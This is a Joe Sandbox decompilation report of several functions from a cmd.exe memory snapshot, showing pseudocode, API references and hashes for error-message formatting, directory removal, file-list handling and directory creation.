0x001d7d65
0x001d7d6b
0x001d7cc6
0x001d7ccf
0x001d7ce0
0x001d7cef
0x001d7cf9
0x001d7d09
0x001d7d0c
0x001d7d11
0x001d7d13
0x001d7d13
0x001d7d18
0x001d7d31
0x001d7d39
0x00000000
0x001d7d3b
0x001d7d3b
0x001d7d3b
0x001d7d39
0x001d7d7c

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 001D7CB9
_ultoa.MSVCRT ref: 001D7CCF
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 001D7CD8
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,001DA21D,000000FF,?,00000020), ref: 001D7CF9
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 001D7D31
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 001D7D65

Strings

Application, xrefs: 001D7D0C
System, xrefs: 001D7D13
(#, xrefs: 001D7CFF

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
String ID: (#$Application$System
API String ID: 3377411628-593978566
Opcode ID: fca0990ffda4008942245128c06a7a2575c93b844b5e783c9053a76887489d19
Instruction ID: 63a5c00ea63e5417b6454f51084b644dd48540d0a3c6a27510b1d5cb6a7dd87d
Opcode Fuzzy Hash: fca0990ffda4008942245128c06a7a2575c93b844b5e783c9053a76887489d19
Instruction Fuzzy Hash: A6314B31A04208ABDB119FA5DC05EFE7BB9EB99710F20412AF911E7291EB709A45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001B8885 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E001B8885(WCHAR* __ecx) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				WCHAR* _v20;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t15;
				signed int _t17;
				void* _t22;
				void* _t26;
				WCHAR* _t27;
				long _t28;
				signed int _t29;

				_t8 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t8 ^ _t29;
				_t27 = __ecx;
				_t28 = 0;
				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
					if(_v14 != 0x3a || _v12 != 0x5c) {
						goto L1;
					} else {
						_t15 = 0;
						L3:
						return E001C6FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
					}
				}
				L1:
				if(RemoveDirectoryW(_t27) == 0) {
					_t28 = GetLastError();
					if(_t28 == 5) {
						_t17 = GetFileAttributesW(_t27);
						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
							if(RemoveDirectoryW(_t27) == 0) {
								_t28 = GetLastError();
							} else {
								_t28 = 0;
							}
						}
					}
				}
				_t15 = _t28;
				goto L3;
			}

0x001b888d
0x001b8894
0x001b889c
0x001b88a2
0x001b88b1
0x001d0638
0x00000000
0x001d0649
0x001d0649
0x001b88c8
0x001b88d7
0x001b88d7
0x001d0638
0x001b88b7
0x001b88c0
0x001d0656
0x001d065b
0x001d0662
0x001d066b
0x001d0695
0x001d06a4
0x001d0697
0x001d0697
0x001d0697
0x001d0695
0x001d066b
0x001d065b
0x001b88c6
0x00000000

APIs

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,001B8857,-00000105), ref: 001B88A8
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,001B8857,-00000105), ref: 001B88B8
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,001B8857,-00000105), ref: 001D0650
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,001B8857,-00000105), ref: 001D0662
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,001B8857,-00000105), ref: 001D067E
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,001B8857,-00000105), ref: 001D068D

Strings

\, xrefs: 001D063E
:, xrefs: 001D0633

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
String ID: :$\
API String ID: 3961617410-1166558509
Opcode ID: 7c0bd92462b7b1dc51445a10e2c8f3a0827345d0d09594c4a156227abc9e33ef
Instruction ID: b9c6793d65d368e4cd356b801ea4b8e4e42de11013805ae5209e32b731a315e7
Opcode Fuzzy Hash: 7c0bd92462b7b1dc51445a10e2c8f3a0827345d0d09594c4a156227abc9e33ef
Instruction Fuzzy Hash: 29117031A00114ABD721BF649C48ABE7BBCEB95B60B55426DF812E2194EF70CD81CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C2DD2 Relevance: 15.4, APIs: 10, Instructions: 400
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E001C2DD2(signed char* __ecx, signed int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				int _v1100;
				void _v1620;
				int _v1628;
				char _v1632;
				int _v1636;
				void _v2156;
				signed int _v2160;
				signed int _v2164;
				signed int _v2168;
				int _v2172;
				signed int _v2176;
				intOrPtr* _v2180;
				signed char* _v2184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t132;
				signed int _t149;
				void* _t169;
				signed int _t171;
				signed int _t181;
				signed int _t182;
				void* _t184;
				signed int _t185;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t195;
				signed int _t201;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				intOrPtr _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t222;
				void* _t243;
				signed int _t245;
				signed int _t248;
				signed int _t265;
				void* _t271;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				signed int _t284;
				signed char* _t285;
				intOrPtr* _t286;
				signed int _t289;

				_t277 = __edx;
				_t132 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t132 ^ _t289;
				_t287 = 0x104;
				_v2164 = 1;
				_t222 = 0;
				_v24 = 1;
				_v2172 = 0;
				_t285 = __ecx;
				_v28 = 0;
				_v2184 = __ecx;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1636 = 0;
				_v1632 = 1;
				_v1628 = 0x104;
				memset( &_v2156, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E001C0C70( &_v2156, ((0 | _v1632 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E001C0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L10:
					_t149 = 1;
					goto L11;
				} else {
					_t169 = E001C0C70( &_v1620, ((0 | _v1096 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
					_t302 = _t169;
					if(_t169 < 0 || E001C4E94( &_v2176, _t277, _t302) == 1) {
						goto L10;
					} else {
						_t287 = _v2176;
						_t171 =  *_t285;
						if( *_t287 == 0) {
							_t171 = _t171 & 0xfffffff7;
							 *_t285 = _t171;
						}
						if((_t171 & 0x00000008) != 0) {
							 *((intOrPtr*)(_t287 + 0x24)) =  *((intOrPtr*)(_t287 + 0x1c)) - 1;
							_t171 =  *_t285;
						}
						if((_t171 & 0x00000200) != 0) {
							 *_t285 = _t171 | 0x00000004;
						}
						 *0x1f3cf0 = _t222;
						_t277 = 1;
						if(E001C4800(_t285, 1, 1,  &_v2160) != 1) {
							_v2168 = _t222;
							E001C0D89(1, 0x1b24ac);
							E001C0D89(1, 0x1b24ac);
							_t222 = _v2160;
							while(1) {
								__eflags = _t222;
								if(_t222 == 0) {
									break;
								}
								E001C0D89(_t277,  *(_t222 + 4));
								__eflags =  *((char*)(_t222 + 0x10));
								_t181 =  *_t285;
								if( *((char*)(_t222 + 0x10)) != 0) {
									_t181 = _t181 | 0x00000100;
									 *_t285 = _t181;
									__eflags = _t285[0x5c];
									if(_t285[0x5c] == 0) {
										L18:
										__eflags = _t181 & 0x00000040;
										if((_t181 & 0x00000040) == 0) {
											_t182 = _v28;
											__eflags = _t182;
											if(_t182 == 0) {
												_t182 =  &_v548;
											}
											E001C0D89(_t277, _t182);
											_t278 =  *(_t222 + 4);
											_t243 = _t278 + 2;
											do {
												_t184 =  *_t278;
												_t278 = _t278 + 2;
												__eflags = _t184 - _v2172;
											} while (_t184 != _v2172);
											_t185 = _v28;
											_t280 = _t278 - _t243 >> 1;
											__eflags = _t185;
											if(_t185 == 0) {
												_t185 =  &_v548;
											}
											_t277 = _t280 + 1;
											E001C4C89( *(_t222 + 4), _t280 + 1, _t185, _v20);
											_t245 = _v1636;
											__eflags = _t245;
											if(_t245 == 0) {
												_t245 =  &_v2156;
											}
											_t187 = _v28;
											__eflags = _t187;
											if(_t187 == 0) {
												_t187 =  &_v548;
											}
											__imp___wcsicmp(_t187, _t245);
											__eflags = _t187;
											if(_t187 == 0) {
												goto L19;
											} else {
												__eflags = _v2168;
												if(_v2168 == 0) {
													L48:
													_t277 =  *(_t222 + 4);
													_t219 = E001DA834(_t287,  *(_t222 + 4));
													__eflags = _t219;
													if(_t219 != 0) {
														goto L10;
													}
													goto L19;
												}
												_t220 = E001BB610(_t222, _t287, _t285);
												__eflags = _t220;
												if(_t220 != 0) {
													goto L10;
												}
												goto L48;
											}
										}
										L19:
										_t248 =  *_t285;
										_t285[0x64] = 0;
										_t285[0x60] = 0;
										_t285[0x68] = 0;
										_t191 = (_t248 & 0x00000010 | 0x00000020) >> 4;
										_t285[0x6c] = 0;
										__eflags = _t248 & 0x00020400;
										if((_t248 & 0x00020400) != 0) {
											_t191 = _t191 | 0x00000004;
										}
										asm("sbb ecx, ecx");
										_t277 = _t287;
										_t253 = _t222;
										_t192 = E001C5266(_t222, _t287, _t285[4], _t285[8], _t191, _t285, 0, E001C65F0,  !( ~(_t248 & 0x00004004)) & E001C6550, E001C64F0);
										_v2164 = _t192;
										__eflags = _t192;
										if(_t192 != 0) {
											L70:
											__eflags =  *0x1dd544;
											if( *0x1dd544 != 0) {
												goto L23;
											}
											__eflags = _t192 - 5;
											if(_t192 != 5) {
												__eflags = _t285[0x60] + _t285[0x64];
												if(_t285[0x60] + _t285[0x64] != 0) {
													goto L23;
												}
												E001BB6CB(_t287);
												__eflags = 0;
												_push(0);
												_push(0x40002711);
												E001BC5A2(_t287);
												_v2164 = 1;
												L75:
												goto L23;
											}
											_push(0);
											_push(5);
											E001BC5A2(_t253);
											goto L75;
										} else {
											__eflags = _t285[0x60] + _t285[0x64];
											if(_t285[0x60] + _t285[0x64] == 0) {
												_t192 = _v2164;
												goto L70;
											}
											__eflags =  *_t285 & 0x00000040;
											if(( *_t285 & 0x00000040) == 0) {
												E001C0D89(_t277, 0x1b24ac);
												_t212 =  *_t222;
												__eflags = _t212;
												if(_t212 == 0) {
													L57:
													_t265 = _v28;
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 =  &_v548;
													}
													_t213 = _v564;
													__eflags = _t213;
													if(_t213 == 0) {
														_t213 =  &_v1084;
													}
													__imp___wcsicmp(_t213, _t265);
													__eflags = _t213;
													if(_t213 == 0) {
														goto L23;
													} else {
														__eflags =  *_t285 & 0x00000010;
														if(( *_t285 & 0x00000010) == 0) {
															L65:
															_t277 = _v1100;
															__eflags = _v1100;
															if(__eflags == 0) {
																_t277 =  &_v1620;
															}
															_t149 = E001DA0D2(_t287, _t277, __eflags,  *_t285, _t285[0x64]);
															__eflags = _t149;
															if(_t149 != 0) {
																L11:
																_v2164 = _t149;
																L12:
																__imp__??_V@YAXPAX@Z(_v1100);
																__imp__??_V@YAXPAX@Z(_v564);
																__imp__??_V@YAXPAX@Z(_v1636);
																__imp__??_V@YAXPAX@Z();
																return E001C6FD0(_v2164, _t222, _v8 ^ _t289, _t277, _t285, _t287, _v28);
															} else {
																goto L23;
															}
														}
														_t149 = E001BB610(_t222, _t287, _t285);
														__eflags = _t149;
														if(__eflags != 0) {
															goto L11;
														}
														_t277 = _t285[0x60];
														_t149 = E001DA7F6(_t222, _t287, _t285[0x60], __eflags,  &(_t285[0x68]),  *_t285);
														__eflags = _t149;
														if(_t149 != 0) {
															goto L11;
														}
														goto L65;
													}
												}
												_t215 =  *((intOrPtr*)(_t212 + 4));
												_t282 = _t215;
												_v2160 = _t215;
												_t271 = _t282 + 2;
												do {
													_t216 =  *_t282;
													_t282 = _t282 + 2;
													__eflags = _t216 - _v2172;
												} while (_t216 != _v2172);
												_t217 = _v564;
												_t284 = _t282 - _t271 >> 1;
												__eflags = _t217;
												if(_t217 == 0) {
													_t217 =  &_v1084;
												}
												_t277 = _t284 + 1;
												__eflags = _t284 + 1;
												E001C4C89(_v2160, _t284 + 1, _t217, _v556);
												goto L57;
											}
											L23:
											E001C0040( *(_t222 + 4));
											_t194 =  *((intOrPtr*)(_t222 + 0xc));
											_v2180 = _t194;
											_v2160 = 1;
											__eflags =  *((intOrPtr*)(_t222 + 8)) - 1;
											if( *((intOrPtr*)(_t222 + 8)) < 1) {
												L27:
												_t195 = _v2168;
												__eflags = _t195;
												if(_t195 != 0) {
													E001C0040(_t195);
												}
												_v2168 = _t222;
												_t222 =  *_t222;
												continue;
											}
											_t286 = _t194;
											do {
												E001C0040( *_t286);
												E001C0040( *((intOrPtr*)(_t286 + 4)));
												E001C0040(_t286);
												_t286 =  *((intOrPtr*)(_t286 + 0xc));
												_t201 = _v2160 + 1;
												_v2160 = _t201;
												__eflags = _t201 -  *((intOrPtr*)(_t222 + 8));
											} while (_t201 <=  *((intOrPtr*)(_t222 + 8)));
											_t285 = _v2184;
											_t287 = _v2176;
											goto L27;
										}
									}
									_push(0);
									_push(0x40002713);
									E001BC5A2(0);
									goto L10;
								}
								__eflags = _t181 & 0x00020000;
								if((_t181 & 0x00020000) == 0) {
									_t181 = _t181 | 0x00000002;
									__eflags = _t181;
									 *_t285 = _t181;
								}
								goto L18;
							}
							E001BB6CB(_t287);
							goto L12;
						} else {
							goto L10;
						}
					}
				}
			}

0x001c2dd2
0x001c2ddd
0x001c2de4
0x001c2dea
0x001c2def
0x001c2df9
0x001c2dfb
0x001c2e06
0x001c2e0c
0x001c2e0e
0x001c2e13
0x001c2e19
0x001c2e1c
0x001c2e24
0x001c2e30
0x001c2e37
0x001c2e40
0x001c2e48
0x001c2e54
0x001c2e5b
0x001c2e64
0x001c2e6c
0x001c2e78
0x001c2e7f
0x001c2e88
0x001c2eae
0x001c2f72
0x001c2f74
0x00000000
0x001c2efe
0x001c2f18
0x001c2f1d
0x001c2f1f
0x00000000
0x001c2f31
0x001c2f31
0x001c2f37
0x001c2f3b
0x001c2f3d
0x001c2f40
0x001c2f40
0x001c2f44
0x001cd999
0x001cd99c
0x001cd99c
0x001c2f4f
0x001cd9a6
0x001cd9a6
0x001c2f5b
0x001c2f64
0x001c2f70
0x001c2fc3
0x001c2fd5
0x001c2fe1
0x001c2fe6
0x001c2fec
0x001c2fec
0x001c2fee
0x00000000
0x00000000
0x001c2ffd
0x001c3002
0x001c3006
0x001c3008
0x001cd9ad
0x001cd9b4
0x001cd9b6
0x001cd9b9
0x001c301a
0x001c301a
0x001c301c
0x001cd9d1
0x001cd9d4
0x001cd9d6
0x001cd9d8
0x001cd9d8
0x001cd9e5
0x001cd9ea
0x001cd9ed
0x001cd9f0
0x001cd9f0
0x001cd9f3
0x001cd9f6
0x001cd9f6
0x001cd9ff
0x001cda04
0x001cda06
0x001cda08
0x001cda0a
0x001cda0a
0x001cda16
0x001cda18
0x001cda1d
0x001cda23
0x001cda25
0x001cda27
0x001cda27
0x001cda2d
0x001cda30
0x001cda32
0x001cda34
0x001cda34
0x001cda3c
0x001cda44
0x001cda46
0x00000000
0x001cda4c
0x001cda4c
0x001cda53
0x001cda64
0x001cda64
0x001cda69
0x001cda6e
0x001cda70
0x00000000
0x00000000
0x00000000
0x001cda76
0x001cda57
0x001cda5c
0x001cda5e
0x00000000
0x00000000
0x00000000
0x001cda5e
0x001cda46
0x001c3022
0x001c3022
0x001c3028
0x001c302e
0x001c3034
0x001c3037
0x001c303a
0x001c303d
0x001c3043
0x001cda7b
0x001cda7b
0x001c3056
0x001c306c
0x001c306e
0x001c3073
0x001c3078
0x001c307e
0x001c3080
0x001cdb67
0x001cdb67
0x001cdb6e
0x00000000
0x00000000
0x001cdb74
0x001cdb77
0x001cdb88
0x001cdb8b
0x00000000
0x00000000
0x001cdb93
0x001cdb98
0x001cdb9a
0x001cdb9b
0x001cdba0
0x001cdba5
0x001cdbaf
0x00000000
0x001cdbb0
0x001cdb7b
0x001cdb7c
0x001cdb7e
0x00000000
0x001c3086
0x001c3089
0x001c308c
0x001cdb61
0x00000000
0x001cdb61
0x001c3092
0x001c3095
0x001cda8e
0x001cda93
0x001cda95
0x001cda97
0x001cdadd
0x001cdadd
0x001cdae0
0x001cdae2
0x001cdae4
0x001cdae4
0x001cdaea
0x001cdaf0
0x001cdaf2
0x001cdaf4
0x001cdaf4
0x001cdafc
0x001cdb04
0x001cdb06
0x00000000
0x001cdb0c
0x001cdb0c
0x001cdb0f
0x001cdb38
0x001cdb38
0x001cdb3e
0x001cdb40
0x001cdb42
0x001cdb42
0x001cdb4f
0x001cdb54
0x001cdb56
0x001c2f75
0x001c2f75
0x001c2f7b
0x001c2f81
0x001c2f8e
0x001c2f9b
0x001c2fa5
0x001c2fc2
0x001cdb5c
0x00000000
0x001cdb5c
0x001cdb56
0x001cdb13
0x001cdb18
0x001cdb1a
0x00000000
0x00000000
0x001cdb22
0x001cdb2b
0x001cdb30
0x001cdb32
0x00000000
0x00000000
0x00000000
0x001cdb32
0x001cdb06
0x001cda99
0x001cda9c
0x001cda9e
0x001cdaa4
0x001cdaa7
0x001cdaa7
0x001cdaaa
0x001cdaad
0x001cdaad
0x001cdab6
0x001cdabe
0x001cdac0
0x001cdac2
0x001cdac4
0x001cdac4
0x001cdad6
0x001cdad6
0x001cdad8
0x00000000
0x001cdad8
0x001c309b
0x001c309e
0x001c30a3
0x001c30a9
0x001c30af
0x001c30b5
0x001c30b8
0x001c30f5
0x001c30f5
0x001c30fb
0x001c30fd
0x001c311a
0x001c311a
0x001c30ff
0x001c3105
0x00000000
0x001c3105
0x001c30ba
0x001c30bc
0x001c30c1
0x001c30c9
0x001c30d0
0x001c30db
0x001c30dd
0x001c30de
0x001c30e4
0x001c30e4
0x001c30e9
0x001c30ef
0x00000000
0x001c30ef
0x001c3080
0x001cd9bf
0x001cd9c0
0x001cd9c5
0x00000000
0x001cd9cb
0x001c300e
0x001c3013
0x001c3015
0x001c3015
0x001c3018
0x001c3018
0x00000000
0x001c3013
0x001c310e
0x00000000
0x00000000
0x00000000
0x00000000
0x001c2f70
0x001c2f1f

APIs

memset.MSVCRT ref: 001C2E1C
memset.MSVCRT ref: 001C2E40
memset.MSVCRT ref: 001C2E64
memset.MSVCRT ref: 001C2E88

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

??_V@YAXPAX@Z.MSVCRT ref: 001C2F81
??_V@YAXPAX@Z.MSVCRT ref: 001C2F8E
??_V@YAXPAX@Z.MSVCRT ref: 001C2F9B
??_V@YAXPAX@Z.MSVCRT ref: 001C2FA5

Part of subcall function 001C4E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001C2F2C,-00000001,-00000001,-00000001,-00000001), ref: 001C4ED6

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$BufferConsoleInfoScreen
String ID:
API String ID: 1034426908-0
Opcode ID: eb11cc497390350ff33b0a3b4e5a6f99e4a56e2f8a3787d28fa85440744c7c42
Instruction ID: bc24cc47b74f76fd691d3d791cf1dbc4496b4e501c4cd7afd7e37622eda67411
Opcode Fuzzy Hash: eb11cc497390350ff33b0a3b4e5a6f99e4a56e2f8a3787d28fa85440744c7c42
Instruction Fuzzy Hash: 1CE1AE71A042199BDB24DF65DC85FAABBB4FF64314F1480ADE84997241EB34EE90CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001BBF30 Relevance: 15.3, APIs: 10, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E001BBF30(short* __edx, WCHAR* _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				WCHAR* _v552;
				short* _v556;
				short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t49;
				long _t59;
				struct _SECURITY_ATTRIBUTES* _t61;
				WCHAR* _t63;
				long _t64;
				WCHAR* _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				signed int _t70;
				signed int _t71;
				short* _t73;
				void* _t74;
				WCHAR* _t76;
				WCHAR* _t80;
				signed int _t81;
				signed int _t82;
				struct _SECURITY_ATTRIBUTES* _t86;
				signed int _t88;
				short* _t89;
				signed int _t97;
				short* _t100;
				WCHAR* _t101;
				WCHAR* _t103;
				WCHAR* _t104;
				struct _SECURITY_ATTRIBUTES* _t105;
				void* _t106;
				signed int _t107;

				_t100 = __edx;
				_t47 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t47 ^ _t107;
				_t104 = _a4;
				_t49 = 0x3a;
				if(_t104[1] != _t49) {
					L2:
					_t105 = 0;
					_v20 = 0x104;
					_v28 = 0;
					_t86 = 1;
					_v24 = 1;
					memset( &_v548, 0, 0x104);
					_t91 =  &_v548;
					if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t59 = 8;
						L39:
						_push(_t105);
						_push(_t59);
						L40:
						E001BC5A2(_t91);
						L8:
						_t105 = _t86;
						L9:
						__imp__??_V@YAXPAX@Z(_v28);
						_t61 = _t105;
						L10:
						return E001C6FD0(_t61, _t86, _v8 ^ _t107, _t100, _t104, _t105);
					}
					_t63 = _v28;
					if(_t63 == 0) {
						_t63 =  &_v548;
					}
					_t91 =  &_v552;
					_t64 = GetFullPathNameW(_t104, _v20, _t63,  &_v552);
					if(_t64 == 0) {
						_t59 = GetLastError();
						goto L39;
					} else {
						if(_t64 >= 0x7fe7) {
							_push(_t104);
							_push(_t86);
							_push(0x400023d9);
							L43:
							E001BC5A2(_t91);
							goto L8;
						}
						if(CreateDirectoryW(_t104, _t105) == 0) {
							_t59 = GetLastError();
							if(_t59 == 0xb7) {
								_push(_t104);
								_push(_t86);
								_push(0x235c);
								goto L43;
							}
							if(_t59 != 3) {
								goto L39;
							}
							if( *0x1f3cc9 == 0) {
								L29:
								_push(_t105);
								_push(0x52);
								goto L40;
							}
							_t91 = _v28;
							_t67 = _t91;
							if(_t91 == 0) {
								_t67 =  &_v548;
							}
							_t100 = 0x5c;
							_t104 = 0x3a;
							_v560 = _t100;
							if(_t67[1] != _t104) {
								_t68 = _t91;
								if(_t91 == 0) {
									_t68 =  &_v548;
								}
								if( *_t68 != _t100) {
									goto L29;
								} else {
									_t69 = _t91;
									if(_t91 == 0) {
										_t69 =  &_v548;
									}
									if(_t69[1] != _t100) {
										goto L29;
									} else {
										_t101 = _t91;
										if(_t91 == 0) {
											_t101 =  &_v548;
										}
										_t100 =  &(_t101[2]);
										_v552 = _t100;
										_t104 = _t100;
										_t70 =  *_t100 & 0x0000ffff;
										if(_t70 == 0) {
											L59:
											if( *_t100 != _t105) {
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
											}
											_t71 =  *_t100 & 0x0000ffff;
											if(_t71 == 0) {
												goto L30;
											}
											_v556 = _t71;
											_t88 = _t71;
											while(1) {
												_t73 = _t104;
												if(_t88 == _v560) {
													break;
												}
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
												_t81 =  *_t100 & 0x0000ffff;
												_v556 = _t100;
												_t88 = _t81;
												if(_t81 != 0) {
													continue;
												}
												_t73 = _t100;
												break;
											}
											_t86 = 1;
											if( *_t100 == _t105) {
												goto L30;
											}
											_t100 =  &(_t73[1]);
											goto L19;
										}
										_t89 = _t100;
										_t97 = _t70;
										_t106 = 0x5c;
										while(1) {
											_t104 = _t89;
											if(_t97 == _t106) {
												break;
											}
											_t100 =  &(_t89[1]);
											_v552 = _t100;
											_t89 = _t100;
											_t82 =  *_t100 & 0x0000ffff;
											_t104 = _t100;
											_t97 = _t82;
											if(_t82 != 0) {
												continue;
											}
											break;
										}
										_t91 = _v28;
										_t86 = 1;
										_t105 = 0;
										goto L59;
									}
								}
							} else {
								_t103 = _t91;
								if(_t91 == 0) {
									_t103 =  &_v548;
								}
								_t100 =  &(_t103[3]);
								while(1) {
									L19:
									_v552 = _t100;
									while(1) {
										L20:
										_t104 =  *_t100 & 0x0000ffff;
										if(_t104 == 0) {
											break;
										} else {
											goto L21;
										}
										while(1) {
											L21:
											_t74 = 0x5c;
											if(_t104 == _t74) {
												break;
											}
											_t100 =  &(_t100[1]);
											_v552 = _t100;
											_t80 =  *_t100 & 0x0000ffff;
											_t104 = _t80;
											if(_t80 != 0) {
												continue;
											}
											_t104 = 0x5c;
											if( *_t100 != _t104) {
												goto L20;
											}
											L26:
											 *_t100 = 0;
											_t76 = _v28;
											if(_t76 == 0) {
												_t76 =  &_v548;
											}
											if(CreateDirectoryW(_t76, _t105) != 0 || GetLastError() == 0xb7) {
												 *_v552 = _t104;
												_t91 = _v28;
												_t100 =  &(_v552[1]);
												goto L19;
											} else {
												goto L29;
											}
										}
										_t104 = 0x5c;
										goto L26;
									}
									L30:
									if(_t91 == 0) {
										_t91 =  &_v548;
									}
									if(CreateDirectoryW(_t91, _t105) != 0) {
										goto L9;
									} else {
										_t59 = GetLastError();
										if(_t59 == 0xb7) {
											goto L9;
										} else {
											goto L39;
										}
									}
								}
							}
						}
						_t86 = _t105;
						goto L8;
					}
				}
				_t98 =  *_t104;
				if(E001C29BB( *_t104) == 0) {
					_push(0);
					_push(0xf);
					E001BC5A2(_t98);
					_t61 = 1;
					goto L10;
				}
				goto L2;
			}

0x001bbf30
0x001bbf3b
0x001bbf42
0x001bbf48
0x001bbf4d
0x001bbf52
0x001bbf64
0x001bbf69
0x001bbf6c
0x001bbf77
0x001bbf7b
0x001bbf7d
0x001bbf80
0x001bbf87
0x001bbfa9
0x001ca3d6
0x001ca3ea
0x001ca3ea
0x001ca3eb
0x001ca3ec
0x001ca3ec
0x001bbfed
0x001bbfed
0x001bbfef
0x001bbff2
0x001bbff8
0x001bbffa
0x001bc00b
0x001bc00b
0x001bbfaf
0x001bbfb4
0x001ca3d9
0x001ca3d9
0x001bbfba
0x001bbfc6
0x001bbfce
0x001ca3e4
0x00000000
0x001bbfd4
0x001bbfd9
0x001ca3f8
0x001ca3f9
0x001ca3fa
0x001ca408
0x001ca408
0x00000000
0x001ca40d
0x001bbfe9
0x001bc00e
0x001bc019
0x001ca401
0x001ca402
0x001ca403
0x00000000
0x001ca403
0x001bc022
0x00000000
0x00000000
0x001bc02f
0x001bc0d7
0x001bc0d7
0x001bc0d8
0x00000000
0x001bc0d8
0x001bc035
0x001bc038
0x001bc03c
0x001ca415
0x001ca415
0x001bc044
0x001bc047
0x001bc048
0x001bc052
0x001ca42b
0x001ca42f
0x001ca431
0x001ca431
0x001ca43a
0x00000000
0x001ca440
0x001ca440
0x001ca444
0x001ca446
0x001ca446
0x001ca450
0x00000000
0x001ca456
0x001ca456
0x001ca45a
0x001ca45c
0x001ca45c
0x001ca462
0x001ca465
0x001ca46b
0x001ca46d
0x001ca473
0x001ca4a2
0x001ca4a5
0x001ca4a7
0x001ca4aa
0x001ca4b0
0x001ca4b0
0x001ca4b2
0x001ca4b8
0x00000000
0x00000000
0x001ca4be
0x001ca4c4
0x001ca4c6
0x001ca4c6
0x001ca4cf
0x00000000
0x00000000
